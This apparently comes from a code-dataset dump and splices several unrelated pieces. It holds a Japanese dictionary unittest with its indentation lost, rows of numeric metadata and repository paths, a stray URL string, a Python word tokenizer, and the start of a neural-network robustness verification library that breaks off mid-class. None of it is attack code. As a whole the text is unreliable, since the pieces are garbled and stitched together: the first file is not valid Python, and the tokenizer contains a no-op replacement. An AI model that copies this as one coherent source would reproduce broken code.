entry = mmap_dic.lookup(u'すもも'.encode('utf8'))[0]
self.assertTrue(type(entry[1]) is str)
self.assertTrue(type(entry[0]) is int)
self.assertTrue(type(entry[2]) is int)
self.assertTrue(type(entry[3]) is int)
self.assertTrue(type(entry[4]) is int)
entry_extra = mmap_dic.lookup_extra(entry[0])
self.assertTrue(type(entry_extra[0]) is str)
self.assertTrue(type(entry_extra[1]) is str)
self.assertTrue(type(entry_extra[2]) is str)
self.assertTrue(type(entry_extra[3]) is str)
self.assertTrue(type(entry_extra[4]) is str)
self.assertTrue(type(entry_extra[5]) is str)
# entry in the user defined dictionary
user_dic = UserDictionary(user_dict=os.path.join(parent_dir, 'tests/user_ipadic.csv'),
enc='utf8', type='ipadic', connections=connections)
entry = user_dic.lookup('東京スカイツリー'.encode('utf8'))[0]
self.assertTrue(type(entry[1]) is str)
self.assertTrue(type(entry[0]) is int)
self.assertTrue(type(entry[2]) is int)
self.assertTrue(type(entry[3]) is int)
self.assertTrue(type(entry[4]) is int)
def test_system_dictionary_cache(self):
sys_dic = SystemDictionary(all_fstdata(), entries(), connections, chardef.DATA, unknowns.DATA)
self.assertEqual(11, len(sys_dic.lookup('小書き'.encode('utf8'))))
self.assertEqual(11, len(sys_dic.lookup('小書き'.encode('utf8'))))
self.assertEqual(11, len(sys_dic.lookup('小書きにしました'.encode('utf8'))))
self.assertEqual(10, len(sys_dic.lookup('みんなと'.encode('utf8'))))
self.assertEqual(10, len(sys_dic.lookup('みんなと'.encode('utf8'))))
self.assertEqual(2, len(sys_dic.lookup('叩く'.encode('utf8'))))
self.assertEqual(2, len(sys_dic.lookup('叩く'.encode('utf8'))))
def test_user_dictionary(self):
# create user dictionary from csv
user_dic = UserDictionary(user_dict=os.path.join(parent_dir, 'tests/user_ipadic.csv'),
enc='utf8', type='ipadic', connections=connections)
self.assertEqual(1, len(user_dic.lookup('東京スカイツリー'.encode('utf8'))))
# save compiled dictionary
dic_dir = os.path.join(parent_dir, 'tests/userdic')
user_dic.save(to_dir=os.path.join(parent_dir, 'tests/userdic'))
self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_FST_DATA)))
self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_ENTRIES_DATA)))
# load compiled dictionary
compiled_user_dic = CompiledUserDictionary(dic_dir, connections=connections)
self.assertEqual(1, len(compiled_user_dic.lookup('とうきょうスカイツリー駅'.encode('utf8'))))
def test_user_dictionary_with_progress(self):
# create user dictionary from csv with progress indicator
progress_indicator = SimpleProgressIndicator(update_frequency=1.0)
with self.assertLogs(logger=p_logger) as cm:
# create user dictionary
large_user_dic = UserDictionary(
user_dict=os.path.join(parent_dir, 'tests/user_ipadic.csv'),
enc='utf8', type='ipadic', connections=connections,
progress_handler=progress_indicator)
entry_count = len(large_user_dic.entries)
# output for each entry and for complete (entry_count + 1)
self.assertEqual((entry_count + 1) * 2, len(cm.output))
# reset after complete
self.assertIsNone(progress_indicator.value)
for i in range(0, (entry_count + 1) * 2):
if i < entry_count:
# progress for reading csv
self.assertIn('Reading user dictionary from CSV', cm.output[i])
self.assertIn(f'{i + 1}/{entry_count}', cm.output[i])
elif i == entry_count:
# on compete loading csv
self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
elif i < entry_count * 2 + 1:
# progress for create_minimum_transducer
self.assertIn('Running create_minimum_transducer', cm.output[i])
self.assertIn(f'{i - entry_count}/{entry_count}', cm.output[i])
elif i == entry_count * 2 + 1:
# on compete loading create_minimum_transducer
self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
# same result as without progress indicator
self.assertEqual(1, len(large_user_dic.lookup('東京スカイツリー'.encode('utf8'))))
def test_simplified_user_dictionary(self):
# create user dictionary from csv
user_dic = UserDictionary(user_dict=os.path.join(parent_dir, 'tests/user_simpledic.csv'),
enc='utf8', type='simpledic', connections=connections)
self.assertEqual(1, len(user_dic.lookup('東京スカイツリー'.encode('utf8'))))
# save compiled dictionary
dic_dir = os.path.join(parent_dir, 'tests/userdic_simple')
user_dic.save(to_dir=os.path.join(parent_dir, 'tests/userdic_simple'))
self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_FST_DATA)))
self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_ENTRIES_DATA)))
# load compiled dictionary
compiled_user_dic = CompiledUserDictionary(dic_dir, connections=connections)
self.assertEqual(1, len(compiled_user_dic.lookup('とうきょうスカイツリー駅'.encode('utf8'))))
def test_simplified_user_dictionary_with_progress(self):
# create simplified user dictionary from csv with progress indicator
progress_indicator = SimpleProgressIndicator(update_frequency=1.0)
with self.assertLogs(logger=p_logger) as cm:
# create user dictionary
large_user_dic = UserDictionary(
user_dict=os.path.join(parent_dir, 'tests/user_simpledic.csv'),
enc='utf8', type='simpledic', connections=connections,
progress_handler=progress_indicator)
entry_count = len(large_user_dic.entries)
# output for each entry and for complete (entry_count + 1)
self.assertEqual((entry_count + 1) * 2, len(cm.output))
# value is reset after complete
self.assertIsNone(progress_indicator.value)
for i in range(0, (entry_count + 1) * 2):
if i < entry_count:
# progress for reading csv
self.assertIn('Reading user dictionary from CSV', cm.output[i])
self.assertIn(f'{i + 1}/{entry_count}', cm.output[i])
elif i == entry_count:
# on compete loading csv
self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
elif i < entry_count * 2 + 1:
# progress for create_minimum_transducer
self.assertIn('Running create_minimum_transducer', cm.output[i])
self.assertIn(f'{i - entry_count}/{entry_count}', cm.output[i])
elif i == entry_count * 2 + 1:
# on compete loading create_minimum_transducer
self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
# same result as without progress indicator
self.assertEqual(1, len(large_user_dic.lookup('東京スカイツリー'.encode('utf8'))))
if __name__ == '__main__':
unittest.main()
| 50.759825
| 112
| 0.649088
| 1,475
| 11,624
| 4.932881
| 0.147797
| 0.071193
| 0.07669
| 0.097993
| 0.809373
| 0.776663
| 0.753848
| 0.741067
| 0.728697
| 0.722375
| 0
| 0.013202
| 0.224535
| 11,624
| 228
| 113
| 50.982456
| 0.793987
| 0.130936
| 0
| 0.573248
| 0
| 0
| 0.091262
| 0.031912
| 0
| 0
| 0
| 0.004386
| 0.56051
| 1
| 0.044586
| false
| 0
| 0.038217
| 0
| 0.089172
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e394cf8051ab02ec8d95d9b81d89e858337e83f4
| 102
|
py
|
Python
|
a24/test.py
|
assassinen/coursera_mfti_python
|
eee7b3c55256f391c1be32924fa1ad3364b307f2
|
[
"Apache-2.0"
] | null | null | null |
a24/test.py
|
assassinen/coursera_mfti_python
|
eee7b3c55256f391c1be32924fa1ad3364b307f2
|
[
"Apache-2.0"
] | null | null | null |
a24/test.py
|
assassinen/coursera_mfti_python
|
eee7b3c55256f391c1be32924fa1ad3364b307f2
|
[
"Apache-2.0"
] | null | null | null |
'https://git.8gen.team/exchange/backoffice/b0-db_generator/blob/BO-188/db_generator/data/test_1.jsonl'
| 102
| 102
| 0.823529
| 18
| 102
| 4.5
| 0.888889
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 102
| 1
| 102
| 102
| 0.735294
| 0.980392
| 0
| 0
| 0
| 1
| 0.970874
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e3ac2abc9f37c57687d9e61cf167f9c0f7957c0b
| 5,897
|
py
|
Python
|
src/renet2/utils/tokenizer.py
|
sujunhao/RENET2
|
21fb57d17544556e5f62737a6df40ff5e5f990ba
|
[
"BSD-3-Clause"
] | 16
|
2021-03-06T10:41:00.000Z
|
2022-03-29T02:16:04.000Z
|
src/renet2/utils/tokenizer.py
|
sujunhao/RENET2
|
21fb57d17544556e5f62737a6df40ff5e5f990ba
|
[
"BSD-3-Clause"
] | 2
|
2021-06-16T10:19:47.000Z
|
2021-07-16T08:12:18.000Z
|
src/renet2/utils/tokenizer.py
|
sujunhao/RENET2
|
21fb57d17544556e5f62737a6df40ff5e5f990ba
|
[
"BSD-3-Clause"
] | 1
|
2022-03-22T02:13:19.000Z
|
2022-03-22T02:13:19.000Z
|
def replace(s, s1, s2, skip):
pos = 0
while (1):
i = s.find(s1, pos)
if (i == -1):
break
if (i > 0 and s[i-1] == skip):
pos = i + 1
continue
s = s[:i] + s2 + s[i+len(s1):]
pos = i + len(s2)
return s
#only add space and split
def tokenize(s):
#print(s)
lt = []
if (s[0] == '"'):
s = "\" " + s[1:]
s = s.replace(" \"", " \" ")
s = s.replace("(\"", "( \" ")
s = s.replace("[\"", "[ \" ")
s = s.replace("{\"", "{ \" ")
s = s.replace("<\"", "< \" ")
s = s.replace("...", " ... ")
s = s.replace(",", " , ")
s = s.replace(";", " ; ")
s = s.replace(":", " : ")
s = s.replace("@", " @ ")
s = s.replace("#", " # ")
s = s.replace("$", " $ ")
s = s.replace("%", " % ")
s = s.replace("&", " & ")
pos = len(s) - 1;
while (pos > 0 and s[pos] == ' '):
pos = pos-1
while (pos > 0):
c = s[pos]
if (c == '[' or c == ']' or c == ')' or c == '}' or c == '>' or
c == '"' or c == '\''):
pos-=1
continue
break
if (pos >= 0 and s[pos] == '.' and not (pos > 0 and s[pos-1] == '.')):
s = s[:pos] + " ." + s[pos+1:]
s = s.replace("?", " ? ")
s = s.replace("!", " ! ")
s = s.replace("[", " [ ")
s = s.replace("]", " ] ")
s = s.replace("(", " ( ")
s = s.replace(")", " ) ")
s = s.replace("{", " { ")
s = s.replace("}", " } ")
s = s.replace("<", " < ")
s = s.replace(">", " > ")
s = s.replace("--", " -- ")
s = " " + s
s = s + " "
s = s.replace("\"", " \" ")
s = replace(s, "' ", " ' ", '\'');
s = s.replace("'s ", " 's ")
s = s.replace("'S ", " 'S ")
s = s.replace("'m ", " 'm ")
s = s.replace("'M ", " 'M ")
s = s.replace("'d ", " 'd ")
s = s.replace("'D ", " 'D ")
s = s.replace("'ll ", " 'll ")
s = s.replace("'re ", " 're ")
s = s.replace("'ve ", " 've ")
s = s.replace("n't ", " n't ")
s = s.replace("'LL ", " 'LL ")
s = s.replace("'RE ", " 'RE ")
s = s.replace("'VE ", " 'VE ")
s = s.replace("N'T ", " N'T ")
s = s.replace(" Cannot ", " Can not ")
s = s.replace(" cannot ", " can not ")
s = s.replace(" D'ye ", " D' ye ")
s = s.replace(" d'ye ", " d' ye ")
s = s.replace(" Gimme ", " Gim me ")
s = s.replace(" gimme ", " gim me ")
s = s.replace(" Gonna ", " Gon na ")
s = s.replace(" gonna ", " gon na ")
s = s.replace(" Gotta ", " Got ta ")
s = s.replace(" gotta ", " got ta ")
s = s.replace(" Lemme ", " Lem me ")
s = s.replace(" lemme ", " lem me ")
s = s.replace(" More'n ", " More 'n ")
s = s.replace(" more'n ", " more 'n ")
s = s.replace("'Tis ", " 'T is ")
s = s.replace("'tis ", " 't is ")
s = s.replace("'Twas ", " 'T was ")
s = s.replace("'twas ", " 't was ")
s = s.replace(" Wanna ", " Wan na ")
s = s.replace(" wanna ", " wanna ")
lt = s.strip().split()
#print(s)
return lt
def tokenize_s(s):
lt = []
#if (s[0] == '"'):
# s = "`` " + s[1:]
#s = s.replace(" \"", " `` ")
#s = s.replace("(\"", "( `` ")
#s = s.replace("[\"", "[ `` ")
#s = s.replace("{\"", "{ `` ")
#s = s.replace("<\"", "< `` ")
if (s[0] == '"'):
s = '" ' + s[1:]
s = s.replace(" \"", " \" ")
s = s.replace("(\"", "( \" ")
s = s.replace("[\"", "[ \" ")
s = s.replace("{\"", "{ \" ")
s = s.replace("<\"", "< \" ")
s = s.replace("...", " ... ")
s = s.replace(",", " , ")
s = s.replace(";", " ; ")
s = s.replace(":", " : ")
s = s.replace("@", " @ ")
s = s.replace("#", " # ")
s = s.replace("$", " $ ")
s = s.replace("%", " % ")
s = s.replace("&", " & ")
pos = len(s) - 1;
while (pos > 0 and s[pos] == ' '):
pos = pos-1
while (pos > 0):
c = s[pos]
if (c == '[' or c == ']' or c == ')' or c == '}' or c == '>' or
c == '"' or c == '\''):
pos-=1
continue
break
if (pos >= 0 and s[pos] == '.' and not (pos > 0 and s[pos-1] == '.')):
s = s[:pos] + " ." + s[pos+1:]
s = s.replace("?", " ? ")
s = s.replace("!", " ! ")
s = s.replace("[", " [ ")
s = s.replace("]", " ] ")
s = s.replace("(", " ( ")
s = s.replace(")", " ) ")
s = s.replace("{", " { ")
s = s.replace("}", " } ")
s = s.replace("<", " < ")
s = s.replace(">", " > ")
s = s.replace("--", " -- ")
s = " " + s
s = s + " "
#s = s.replace("\"", " '' ")
s = s.replace("\"", " \" ")
s = s.replace("' ", " ' ")
#s = replace(s, "' ", " ' ", '\'');
s = s.replace("'s ", " 's ")
s = s.replace("'S ", " 'S ")
s = s.replace("'m ", " 'm ")
s = s.replace("'M ", " 'M ")
s = s.replace("'d ", " 'd ")
s = s.replace("'D ", " 'D ")
s = s.replace("'ll ", " 'll ")
s = s.replace("'re ", " 're ")
s = s.replace("'ve ", " 've ")
s = s.replace("n't ", " n't ")
s = s.replace("'LL ", " 'LL ")
s = s.replace("'RE ", " 'RE ")
s = s.replace("'VE ", " 'VE ")
s = s.replace("N'T ", " N'T ")
s = s.replace(" Cannot ", " Can not ")
s = s.replace(" cannot ", " can not ")
s = s.replace(" D'ye ", " D' ye ")
s = s.replace(" d'ye ", " d' ye ")
#s = s.replace(" Gimme ", " Gim me ")
#s = s.replace(" gimme ", " gim me ")
#s = s.replace(" Gonna ", " Gon na ")
#s = s.replace(" gonna ", " gon na ")
#s = s.replace(" Gotta ", " Got ta ")
#s = s.replace(" gotta ", " got ta ")
#s = s.replace(" Lemme ", " Lem me ")
#s = s.replace(" lemme ", " lem me ")
#s = s.replace(" More'n ", " More 'n ")
#s = s.replace(" more'n ", " more 'n ")
#s = s.replace("'Tis ", " 'T is ")
#s = s.replace("'tis ", " 't is ")
#s = s.replace("'Twas ", " 'T was ")
#s = s.replace("'twas ", " 't was ")
#s = s.replace(" Wanna ", " Wan na ")
#s = s.replace(" wanna ", " wanna ")
s = s.replace("-", " - ")
s = s.replace("'", " ' ")
s = s.replace("/", " / ")
s = s.replace("_", " _ ")
s = s.replace("*", " * ")
s = s.replace("+", " + ")
s = s.replace("=", " = ")
s = s.replace(".", " . ")
s = s.replace(";", " ; ")
lt = s.strip().split()
return lt
| 26.09292
| 72
| 0.370527
| 819
| 5,897
| 2.664225
| 0.069597
| 0.147571
| 0.560953
| 0.311641
| 0.907883
| 0.907883
| 0.907883
| 0.907883
| 0.907883
| 0.907883
| 0
| 0.008744
| 0.301848
| 5,897
| 225
| 73
| 26.208889
| 0.521253
| 0.14465
| 0
| 0.772455
| 0
| 0.011976
| 0.178265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017964
| false
| 0
| 0
| 0
| 0.035928
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3fd3ed47ad8b8905f736c911abe74102883803a
| 25,448
|
py
|
Python
|
pytorch_ares/third_party/hydra/symbolic_interval/interval.py
|
thu-ml/realsafe
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 107
|
2020-06-15T09:55:11.000Z
|
2020-12-20T11:27:11.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/interval.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 7
|
2020-06-14T03:00:18.000Z
|
2020-12-07T07:10:10.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/interval.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 19
|
2020-06-14T08:35:33.000Z
|
2020-12-19T13:43:41.000Z
|
'''
Interval class definitions
** Top contributor: Shiqi Wang
** This file is part of the symbolic interval analysis library.
** Copyright (c) 2018-2019 by the authors listed in the file LICENSE
** and their institutional affiliations.
** All rights reserved.
'''
from __future__ import print_function
import numpy as np
import torch
import warnings
class Interval():
'''Naive interval class
Naive interval propagation is low-cost (only around two times slower
than regular NN propagation). However, the output range provided is
loose. This is because the dependency of inputs are ignored.
See ReluVal https://arxiv.org/abs/1804.10829 for more details of
the tradeoff.
Naive interval propagation are used for many existing training
schemes:
(1) DiffAi: http://proceedings.mlr.press/v80/mirman18b/mirman18b.pdf
(2) IBP: https://arxiv.org/pdf/1810.12715.pdf
These training schemes are fast but the robustness of trained models
suffers from the loose estimations of naive interval propagation.
Args:
lower: numpy matrix of the lower bound for each layer nodes
upper: numpy matrix of the upper bound for each layer nodes
lower and upper should have the same shape of input for
each layer
no upper value should be less than corresponding lower value
* :attr:`l` and `u` keeps the upper and lower values of the
interval. Naive interval propagation using them to propagate.
* :attr:`c` and `e` means the center point and the error range
of the interval. Symbolic interval propagation using to propagate
since it can keep the dependency more efficiently.
* :attr:`mask` is used to keep the estimation information for each
hidden node. It has the same shape of the ReLU layer input.
for each hidden node, before going through ReLU, let [l,u] denote
a ReLU's input range. It saves the value u/(u-l), which is the
slope of estimated output dependency. 0 means, given the input
range, this ReLU's input will always be negative and the output
is always 0. 1 indicates, it always stays positive and the
output will not change. Otherwise, this node is estimated during
interval propagation and will introduce overestimation error.
'''
def __init__(self, lower, upper, use_cuda=False):
if(not isinstance(self, Inverse_interval)):
assert not ((upper-lower)<0).any(), "upper less than lower"
self.l = lower
self.u = upper
self.c = (lower+upper)/2
self.e = (upper-lower)/2
self.mask = []
self.use_cuda = use_cuda
def update_lu(self, lower, upper):
'''Update this interval with new lower and upper numpy matrix
Args:
lower: numpy matrix of the lower bound for each layer nodes
upper: numpy matrix of the upper bound for each layer nodes
'''
# if(not isinstance(self, Inverse_interval)):
# assert not ((upper-lower)<0).any(), "upper less than lower"
self.l = lower
self.u = upper
self.c = (lower+upper)/2
self.e = (upper-lower)/2
def update_ce(self, center, error):
'''Update this interval with new error and center numpy matrix
Args:
lower: numpy matrix of the lower bound for each layer nodes
upper: numpy matrix of the upper bound for each layer nodes
'''
# if(not isinstance(self, Inverse_interval)):
# assert not (error<0).any(), "upper less than lower"
self.c = center
self.e = error
self.u = self.c+self.e
self.l = self.c-self.e
def __str__(self):
'''Print function
'''
string = "interval shape:"+str(self.c.shape)
string += "\nlower:"+str(self.l)
string += "\nupper:"+str(self.u)
return string
def worst_case(self, y, output_size):
'''Calculate the wrost case of the analyzed output ranges.
In details, it returns the upper bound of other label minus
the lower bound of the target label. If the returned value is
less than 0, it means the worst case provided by interval
analysis will never be larger than the target label y's.
'''
assert y.shape[0] == self.l.shape[0] == self.u.shape[0],\
"wrong input shape"
for i in range(y.shape[0]):
t = self.l[i, y[i]]
self.u[i] = self.u[i]-t
self.u[i, y[i]] = 0.0
return self.u
class Inverse_interval(Interval):
def __init__(self, lower, upper, use_cuda=False):
assert lower.shape[0]==upper.shape[0], "each symbolic"+\
"should have the same shape"
Interval.__init__(self, lower, upper)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
def worst_case(self, y, output_size):
assert y.shape[0] == self.l.shape[0] == self.u.shape[0],\
"wrong input shape"
'''Taking the norm of the inverse interval for the worst case
'''
u = self.c.abs()+self.e.abs()
return u
class Symbolic_interval(Interval):
'''Symbolic interval class
Symbolic interval analysis is a state-of-the-art tight output range
analyze method. It captured the dependencies ignored by naive
interval propagation. As the tradeoff, the cost is much higher than
naive interval and regular propagations. To maximize the tightness,
symbolic linear relaxation is used. More details can be found in
Neurify: https://arxiv.org/pdf/1809.08098.pdf
There are several similar methods which can provide close tightness
(1) Convex polytope: https://arxiv.org/abs/1711.00851
(2) FastLin: https://arxiv.org/abs/1804.09699
(3) DeepZ: https://files.sri.inf.ethz.ch/website/papers/DeepZ.pdf
This lib implements symbolic interval analysis, which can provide
one of the tightest and most efficient analysis among all these
methods.
Symbolic interval analysis is used to verifiably robust train the
networks in MixTrain, providing state-of-the-art efficiency and
verifiable robustness. See https://arxiv.org/abs/1811.02625 for more
details.
Similar training methods include:
(1) Scaling defense: https://arxiv.org/abs/1805.12514
(2) DiffAI: http://proceedings.mlr.press/v80/mirman18b/mirman18b.pdf
* :attr:`shape` is the input shape of ReLU layers.
* :attr:`n` is the number of hidden nodes in each layer.
* :attr:`idep` keeps the input dependencies.
* :attr:`edep` keeps the error dependency introduced by each
overestimated nodes.
'''
def __init__(self, lower, upper, epsilon=0, norm="linf", use_cuda=False):
assert lower.shape[0]==upper.shape[0], "each symbolic"+\
"should have the same shape"
Interval.__init__(self, lower, upper)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
self.epsilon = epsilon
self.norm = norm
if(self.use_cuda):
self.idep = torch.eye(self.n, device=\
self.c.get_device()).unsqueeze(0)
else:
self.idep = torch.eye(self.n).unsqueeze(0)
self.edep = []
self.edep_ind = []
'''Calculating the upper and lower matrix for symbolic intervals.
To make concretize easier, convolutional layer nodes will be
extended first.
'''
def concretize(self):
self.extend()
if self.norm=="linf":
e = (self.idep*self.e.view(self.batch_size,\
self.input_size, 1)).abs().sum(dim=1)
elif self.norm == "l2":
# idep = (self.idep*self.idep)\
# .sum(dim=1, keepdim=False).sqrt()
idep = torch.norm(self.idep, dim=1, keepdim=False)
e = idep*self.epsilon
elif self.norm == "l1":
idep = self.idep.abs().max(dim=1, keepdim=False)[0]
e = idep*self.epsilon
if self.edep:
#print("sym e1", e)
for i in range(len(self.edep)):
e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
#print("sym e2", e)
self.l = self.c - e
self.u = self.c + e
return self
'''Extending convolutional layer nodes to a two-dimensional vector.
'''
def extend(self):
self.c = self.c.reshape(self.batch_size, self.n)
self.idep = self.idep.reshape(-1, self.input_size, self.n)
for i in range(len(self.edep)):
self.edep[i] = self.edep[i].reshape(-1, self.n)
'''Convert the extended layer back to the shape stored in `shape`.
'''
def shrink(self):
self.c = self.c.reshape(tuple([-1]+self.shape))
self.idep = self.idep.reshape(tuple([-1]+self.shape))
for i in range(len(self.edep)):
self.edep[i] = self.edep[i].reshape(\
tuple([-1]+self.shape))
'''Calculate the wrost case of the analyzed output ranges.
Return the upper bound of other output dependency minus target's
output dependency. If the returned value is less than 0, it means
the worst case provided by interval analysis will never be larger
than the target label y's.
'''
def worst_case(self, y, output_size):
assert y.shape[0] == self.l.shape[0] == self.batch_size,\
"wrong label shape"
if(self.use_cuda):
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False, device=y.get_device())[y]
else:
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False)[y]
c_t = self.c.masked_select(kk).unsqueeze(1)
self.c = self.c - c_t
idep_t = self.idep.masked_select(\
kk.view(self.batch_size,1,output_size)).\
view(self.batch_size, self.input_size,1)
self.idep = self.idep-idep_t
for i in range(len(self.edep)):
edep_t = self.edep[i].masked_select((self.edep_ind[i].\
mm(kk.type_as(self.edep_ind[i]))).type_as(kk)).\
view(-1,1)
self.edep[i] = self.edep[i]-edep_t
self.concretize()
return self.u
class mix_interval(Symbolic_interval):
def __init__(self, lower, upper, epsilon=0, norm="linf", use_cuda=False):
assert lower.shape[0]==upper.shape[0], "each symbolic"+\
"should have the same shape"
Symbolic_interval.__init__(self, lower, upper)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
self.epsilon = epsilon
self.norm = norm
if(self.use_cuda):
self.idep = torch.eye(self.n, device=\
self.c.get_device()).unsqueeze(0)
else:
self.idep = torch.eye(self.n).unsqueeze(0)
self.edep = []
self.edep_ind = []
self.nl = self.l.clone().detach()
self.nu = self.u.clone().detach()
self.nc = self.c.clone().detach()
self.ne = self.e.clone().detach()
'''Calculating the upper and lower matrix for symbolic intervals.
To make concretize easier, convolutional layer nodes will be
extended first.
'''
def concretize(self):
self.extend()
if self.norm=="linf":
e = (self.idep*self.e.view(self.batch_size,\
self.input_size, 1)).abs().sum(dim=1)
elif self.norm == "l2":
# idep = (self.idep*self.idep)\
# .sum(dim=1, keepdim=False).sqrt()
idep = torch.norm(self.idep, dim=1, keepdim=False)
e = idep*self.epsilon
elif self.norm == "l1":
idep = self.idep.abs().max(dim=1, keepdim=False)[0]
e = idep*self.epsilon
if self.edep:
#print("sym e1", e)
for i in range(len(self.edep)):
e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
#print("sym e2", e)
self.l = self.c - e
self.u = self.c + e
self.l = torch.where(self.l>self.nl, self.l, self.nl)
self.u = torch.where(self.u<self.nu, self.u, self.nu)
return self
'''Extending convolutional layer nodes to a two-dimensional vector.
'''
def extend(self):
self.c = self.c.reshape(self.batch_size, self.n)
self.idep = self.idep.reshape(-1, self.input_size, self.n)
for i in range(len(self.edep)):
self.edep[i] = self.edep[i].reshape(-1, self.n)
self.nc = self.nc.reshape(self.batch_size, self.n)
self.ne = self.ne.reshape(self.batch_size, self.n)
self.nl = self.nl.reshape(self.batch_size, self.n)
self.nu = self.nu.reshape(self.batch_size, self.n)
'''Convert the extended layer back to the shape stored in `shape`.
'''
def shrink(self):
self.c = self.c.reshape(tuple([-1]+self.shape))
self.idep = self.idep.reshape(tuple([-1]+self.shape))
for i in range(len(self.edep)):
self.edep[i] = self.edep[i].reshape(\
tuple([-1]+self.shape))
self.nc = self.nc.reshape(tuple([-1]+self.shape))
self.ne = self.ne.reshape(tuple([-1]+self.shape))
self.nl = self.nl.reshape(tuple([-1]+self.shape))
self.nu = self.nu.reshape(tuple([-1]+self.shape))
'''Calculate the wrost case of the analyzed output ranges.
Return the upper bound of other output dependency minus target's
output dependency. If the returned value is less than 0, it means
the worst case provided by interval analysis will never be larger
than the target label y's.
'''
def worst_case(self, y, output_size):
assert y.shape[0] == self.l.shape[0] == self.batch_size,\
"wrong label shape"
if(self.use_cuda):
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False, device=y.get_device())[y]
else:
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False)[y]
c_t = self.c.masked_select(kk).unsqueeze(1)
self.c = self.c - c_t
idep_t = self.idep.masked_select(\
kk.view(self.batch_size,1,output_size)).\
view(self.batch_size, self.input_size,1)
self.idep = self.idep-idep_t
for i in range(len(self.edep)):
edep_t = self.edep[i].masked_select((self.edep_ind[i].\
mm(kk.type_as(self.edep_ind[i]))).type_as(kk)).\
view(-1,1)
self.edep[i] = self.edep[i]-edep_t
self.concretize()
return self.u
class Center_symbolic_interval(Interval):
def __init__(self, lower, upper, use_cuda=False):
assert lower.shape[0]==upper.shape[0], "each symbolic"+\
"should have the same shape"
Interval.__init__(self, lower, upper)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
if(self.use_cuda):
self.idep = torch.eye(self.n, device=\
self.c.get_device()).unsqueeze(0)
else:
self.idep = torch.eye(self.n).unsqueeze(0)
'''Calculating the upper and lower matrix for symbolic intervals.
To make concretize easier, convolutional layer nodes will be
extended first.
'''
def concretize(self):
self.extend()
e = (self.idep*self.e.view(self.batch_size,\
self.input_size, 1)).abs().sum(dim=1)
self.l = self.c - e
self.u = self.c + e
return self
'''Extending convolutional layer nodes to a two-dimensional vector.
'''
def extend(self):
self.c = self.c.reshape(self.batch_size, self.n)
self.idep = self.idep.reshape(-1, self.input_size, self.n)
'''Convert the extended layer back to the shape stored in `shape`.
'''
def shrink(self):
self.c = self.c.reshape(tuple([-1]+self.shape))
self.idep = self.idep.reshape(tuple([-1]+self.shape))
'''Calculate the wrost case of the analyzed output ranges.
Return the upper bound of other output dependency minus target's
output dependency. If the returned value is less than 0, it means
the worst case provided by interval analysis will never be larger
than the target label y's.
'''
def worst_case(self, y, output_size):
assert y.shape[0] == self.l.shape[0] == self.batch_size,\
"wrong label shape"
if(self.use_cuda):
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False, device=y.get_device())[y]
else:
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False)[y]
c_t = self.c.masked_select(kk).unsqueeze(1)
self.c = self.c - c_t
idep_t = self.idep.masked_select(\
kk.view(self.batch_size,1,output_size)).\
view(self.batch_size, self.input_size,1)
self.idep = self.idep-idep_t
self.concretize()
return self.u
class Symbolic_interval_proj1(Interval):
'''
* :attr:`shape` is the input shape of ReLU layers.
* :attr:`n` is the number of hidden nodes in each layer.
* :attr:`idep` keeps the input dependencies.
* :attr:`edep` keeps the error dependency introduced by each
overestimated nodes.
'''
def __init__(self, lower, upper, proj=None, proj_ind=None, use_cuda=False):
assert lower.shape[0]==upper.shape[0], "each symbolic"+\
"should have the same shape"
